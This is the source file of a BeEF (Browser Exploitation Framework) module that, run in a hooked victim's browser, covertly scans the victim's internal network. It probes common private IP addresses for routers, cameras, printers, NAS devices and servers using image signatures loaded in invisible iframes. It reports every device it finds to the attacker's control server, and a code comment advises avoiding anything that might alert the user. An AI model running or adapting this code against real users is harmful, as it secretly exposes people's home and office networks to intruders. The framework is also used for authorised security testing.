CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/network/internal_network_fingerprinting/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
  var ips = new Array();
10
  var ipRange = "<%= @ipRange %>";
11
  var ports   = "<%= @ports %>";
12
  var threads = parseInt("<%= @threads %>", 10);
13
  var timeout = parseInt("<%= @timeout %>", 10)*1000;
14
  var wait    = parseInt("<%= @wait %>", 10)*1000;
15

16
  if (ports != null) {
17
    ports = ports.split(',');
18
  }
19

20
  // set target IP addresses
21
  if (ipRange == 'common') {
22
    // use default IPs
23
    ips = [
24
      '192.168.0.1',
25
      '192.168.0.100',
26
      '192.168.0.254',
27
      '192.168.1.1',
28
      '192.168.1.100',
29
      '192.168.1.254',
30
      '10.0.0.1',
31
      '10.1.1.1',
32
      '192.168.2.1',
33
      '192.168.2.254',
34
      '192.168.100.1',
35
      '192.168.100.254',
36
      '192.168.123.1',
37
      '192.168.123.254',
38
      '192.168.10.1',
39
      '192.168.10.254'
40
    ];
41
  } else {
42
    // set target IP range
43
    var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
44
    if (range == null || range[1] == null) {
45
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
46
      return;
47
    }
48
    // ipRange will be in the form of 192.168.0.1-192.168.0.254
49
    // the fourth octet will be iterated.
50
    // (only C class IP ranges are supported atm)
51
    ipBounds   = ipRange.split('-');
52
    lowerBound = ipBounds[0].split('.')[3];
53
    upperBound = ipBounds[1].split('.')[3];
54
    for (i=lowerBound;i<=upperBound;i++){
55
      ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
56
      ips.push(ipToTest);
57
    }
58
  }
59

60
  /* Signatures in the form of:
61
     "Dev/App Name", -- string
62
     "Default Port", -- string
63
     "Protocol",     -- string -- http/https
64
     "Use Multiple Ports if specified", -- boolean
65
     "IMG path",     -- string -- file URI path
66
     "IMG width",    -- integer
67
     "IMG height"    -- integer
68

69
    When adding new signatures, try to find images which:
70
     * have a unique URI and width/height combination
71
     * use a valid SSL certificate - invalid certs prevent the resouce from loading
72
     * do not require HTTP authentication - auth popups may alert the user to the scan
73
   */
74
  var urls = new Array(
75
  new Array(
76
    "Apache",
77
    "80","http",false,
78
    "/icons/apache_pb.gif",259,32),
79
  new Array(
80
    "Apache 2.x",
81
    "80","http",false,
82
    "/icons/apache_pb2.gif",259,32),
83
  new Array(
84
    "Microsoft IIS 7.x",
85
    "80","http",false,
86
    "/welcome.png",571,411),
87
  new Array(
88
    "Microsoft IIS",
89
    "80","http",false,
90
    "/pagerror.gif",36,48),
91
  new Array(
92
    "PHP",
93
    "80","http",false,
94
    "/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42",120,67),
95
  new Array(
96
    "QNAP NAS",
97
    "8080","http",false,
98
    "/ajax_obj/img/running.gif",16,16),
99
  new Array(
100
    "QNAP NAS",
101
    "443","https",false,
102
    "/cgi-bin/images/login/cloud_portal.png",165,32),
103
  new Array(
104
    "Asus RT Series Router",
105
    "80","http",false,
106
    "/images/top-02.gif",359,78),
107
  new Array(
108
    "Asus RX Series Router",
109
    "80","http",false,
110
    "/images/bu_blue.gif",82,16),
111
  new Array(
112
    "Belkin Router",
113
    "80","http",false,
114
    "/images/title_2.gif",321,28),
115
  new Array(
116
    "Billion Router",
117
    "80","http",false,
118
    "/customized/logo.gif",318,69),
119
  new Array(
120
    "Billion Router",
121
    "80","http",false,
122
    "/customized/logo.gif",224,55),
123
  new Array(
124
    "Netgear N300 Router",
125
    "80","http",false,
126
    "/settings.gif",750,85),
127
  new Array(
128
    "Linksys NAS",
129
    "80","http",false,
130
    "/Admin_top.JPG",750,52),
131
  new Array(
132
    "Linksys NAS",
133
    "80","http",false,
134
    "/logo.jpg",194,52),
135
  new Array(
136
    "D-Link DCS Camera",
137
    "80","http",false,
138
    "/devmodel.jpg",127,27),
139
  new Array(
140
    "Linksys Network Camera",
141
    "80","http",false,
142
    "/welcome.jpg",146,250),
143
  new Array(
144
    "Linksys Wireless-G Camera",
145
    "80","http",false,
146
    "/header.gif",750,97),
147
  new Array(
148
    "Cisco IP Phone",
149
    "80","http",false,
150
    "/Images/Logo",120,66),
151
  new Array(
152
    "Snom Phone",
153
    "80","http",false,
154
    "/img/snom_logo.png",168,62),
155
  new Array(
156
    "Dell Laser Printer",
157
    "80","http",false,
158
    "/ews/images/delllogo.gif",100,100),
159
  new Array(
160
    "Brother Printer",
161
    "80","http",false,
162
    "/pbio/brother.gif",144,52),
163
  new Array(
164
    "HP LaserJet Printer",
165
    "80","http",false,
166
    "/hp/device/images/logo.gif",42,27),
167
  new Array(
168
    "HP LaserJet Printer",
169
    "80","http",false,
170
    "/hp/device/images/hp_invent_logo.gif",160,52),
171
  new Array(
172
    "JBoss Application server",
173
    "8080","http",true,
174
    "/images/logo.gif",226,105),
175
  new Array(
176
    "APC InfraStruXure Manager",
177
    "80","http",false,
178
    "/images/Xlogo_Layer-1.gif",342,327),
179
  new Array(
180
    "Barracuda Spam/Virus Firewall",
181
    "8000","http",true,
182
    "/images/powered_by.gif",211,26),
183
  new Array(
184
    "TwonkyMedia Server",
185
    "9000","http",false,
186
    "/images/TwonkyMediaServer_logo.jpg",150,82),
187
  new Array(
188
    "VMware ESXi Server",
189
    "80","http",false,
190
    "/background.jpeg",1,1100),
191
  new Array(
192
    "Microsoft Remote Web Workplace",
193
    "80","http",false,
194
    "/Remote/images/submit.gif",31,31),
195
  new Array(
196
    "XAMPP",
197
    "80","http",false,
198
    "/xampp/img/xampp-logo-new.gif",200,59),
199
  new Array(
200
    "Xerox Printer",
201
    "80","http",false,
202
    "/printbut.gif",30,30),
203
  new Array(
204
    "Konica Minolta Printer",
205
    "80","http",false,
206
    "/G27_light.gif",206,26),
207
  new Array(
208
    "Epson Printer",
209
    "80","http",false,
210
    "/cyandot.gif",1,1),
211
  new Array(
212
    "HP Printer",
213
    "80","http",false,
214
    "/hp/device/images/hp_invent_logo.gif",160,52),
215
  new Array(
216
    "HP Printer Photosmart series",
217
    "80","http",false,
218
    "/webApps/images/hp_d_rgb_m.gif",50,50),
219
  new Array(
220
    "Lexmark Printer",
221
    "80","http",false,
222
    "/images/lexlogo.gif",153,115),
223
  new Array(
224
    "Canon Printer",
225
    "8000","http",false,
226
    "/login/image/canonlogo.gif",100,37),
227
  new Array(
228
    "Zenoss",
229
    "8080","http",false,
230
    "/zport/dmd/favicon.ico",16,16),
231
  new Array(
232
    "Wordpress",
233
    "80","http",true,
234
    "/wp-includes/images/wpmini-blue.png",16,16),
235
  new Array(
236
    "Glassfish Server",
237
    "4848","http",false,
238
    "/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200),
239
  new Array(
240
    "pfSense",
241
    "443","https",false,
242
    "/themes/pfsense_ng/images/logo.gif",200,56),
243
  new Array(
244
    "pfSense CE <= 2.3.2",
245
    "80","http",false,
246
    "/logo.png",124,36),
247
  new Array(
248
    "Apache Tomcat",
249
    "8080","http",true,
250
    "/docs/images/tomcat.gif",146,92),
251
  new Array(
252
    "Jenkins",
253
    "80","http",false,
254
    "/static/"+Math.random().toString(36).substring(2,10)+"/images/jenkins.png",240,323),
255
  new Array(
256
    "SAP NetWeaver",
257
    "80","http",true,
258
    "/logon/layout/shadow.jpg",18,4),
259
  new Array(
260
    "Netscape iPlanet",
261
    "80","http",true,
262
    "/mc-icons/menu.gif",21,18),
263
  new Array("Kemp Load Master", "443", "https", false, "/kemplogo.png",951,75),
264
  new Array(
265
    "m0n0wall",
266
    "80","http",false,
267
    "/logo.gif",150,47),
268
  new Array("SMC Router","80","http",false,"/images/logo.gif",133,59),
269
  new Array("ntop","3000","http",false,"/ntop_logo.png",103,50),
270
  new Array(
271
	"ZeroShell",
272
	"80","http",false,
273
	"/kerbynet/Zeroshell.gif",180,63)
274

275
// Uncommon signatures
276
//new Array("Microsoft ADFS","80","http",false,"/adfs/portal/illustration/illustration.png",1420,1080),
277
//new Array("Rejetto HttpFileServer", "8080", "http",i true, "/~img27",16,16),
278
//new Array("Citrix MetaFrame", "80", "http", false, "/Citrix/MetaFrameXP/default/media/nfusehead.gif",230,41),
279
//new Array("Oracle E-Business Suite","80","http",false,"/OA_MEDIA/FNDSSCORP.gif",134,31),
280
//new Array("OracleAS Reports Service","80","http",false,"/reports/images/oraclelogo_sizewithprodbrand.gif",133,20),
281
//new Array("Oracle iLearning","80","http",false,"/ilearn/en/shared/img/coin_help_ready.gif",60,32),
282
//new Array("RSA Self-Service Console", "80", "http",false,"/console-selfservice/images/default/icn_help.gif",14,14),
283
//new Array("Sambar Server", "80", "http",false,"/sysimage/system/powerby.gif",41,23),
284
//new Array("BeEF","3000","http",false,"/ui/media/images/beef.png",200,149),
285
//new Array("BeEF (PHP)","80","http",false,"/beef/images/beef.gif",32,32),
286
//new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
287
//new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
288
//new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
289
//new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
290
//new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
291
  );
292

293
  checkSignature = function(signature_id, signature_name, proto, ip, port, uri) {
294
    var img = new Image;
295
    var dom = beef.dom.createInvisibleIframe();
296
    dom.setAttribute('id', 'lan_<%= @command_id %>_'+signature_id+'_'+proto+'_'+ip);
297
    beef.debug("[Network Fingerprint] Checking for [" + signature_name + "] at IP [" + ip + "] (" + proto + ")");
298
    img.id  = signature_id;
299
    img.src = proto+"://"+ip+":"+port+uri;
300
    img.onerror = function() { dom.removeChild(this); }
301
    img.onload = function() {
302
      if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) {
303
        beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src), beef.are.status_success());dom.removeChild(this);
304
        beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]");
305
      }
306
    }
307
    dom.appendChild(img);
308
    // stop & remove iframe
309
    setTimeout(function() {
310
      if (dom.contentWindow.stop !== undefined) {
311
        dom.contentWindow.stop();
312
      } else if (dom.contentWindow.document.execCommand !== undefined) {
313
        dom.contentWindow.document.execCommand("Stop", false);
314
      }
315
      document.body.removeChild(dom);
316
    }, timeout);
317
  }
318

319
  WorkerQueue = function(frequency) {
320

321
    var stack = [];
322
    var timer = null;
323
    var frequency = frequency;
324
    var start_scan = (new Date).getTime();
325

326
    this.process = function() {
327
      var item = stack.shift();
328
      eval(item);
329
      if (stack.length === 0) {
330
        clearInterval(timer);
331
        timer = null;
332
        var interval = (new Date).getTime() - start_scan;
333
        beef.debug("[Network Fingerprint] Worker queue is complete ["+interval+" ms]");
334
        return;
335
      }
336
    }
337

338
    this.queue = function(item) {
339
      stack.push(item);
340
      if (timer === null) {
341
        timer = setInterval(this.process, frequency);
342
      }
343
    }
344

345
  }
346

347
  // create worker queue
348
  var workers = new Array();
349
  for (w=0; w < threads; w++) {
350
    workers.push(new WorkerQueue(wait));
351
  }
352

353
  // for each URI signature
354
  for (var u=0; u < urls.length; u++) {
355
    var worker = workers[u % threads];
356
    // for each LAN IP address
357
    for (var i=0; i < ips.length; i++) {
358
      if (!urls[u][3]) {
359
        // use default port
360
        worker.queue('checkSignature("'+u+'","'+urls[u][0]+'","'+urls[u][2]+'","'+ips[i]+'","'+urls[u][1]+'","'+urls[u][4]+'");');
361
      } else {
362
        // iterate through all the specified ports
363
        for (var p=0; p < ports.length; p++) {
364
          worker.queue('checkSignature("'+u+'","'+urls[u][0]+'","'+urls[u][2]+'","'+ips[i]+'","'+ports[p]+'","'+urls[u][4]+'");');
365
        }
366
      }
367
    }
368
  }
369

370
});
371

372

373
Product

Resources

Company
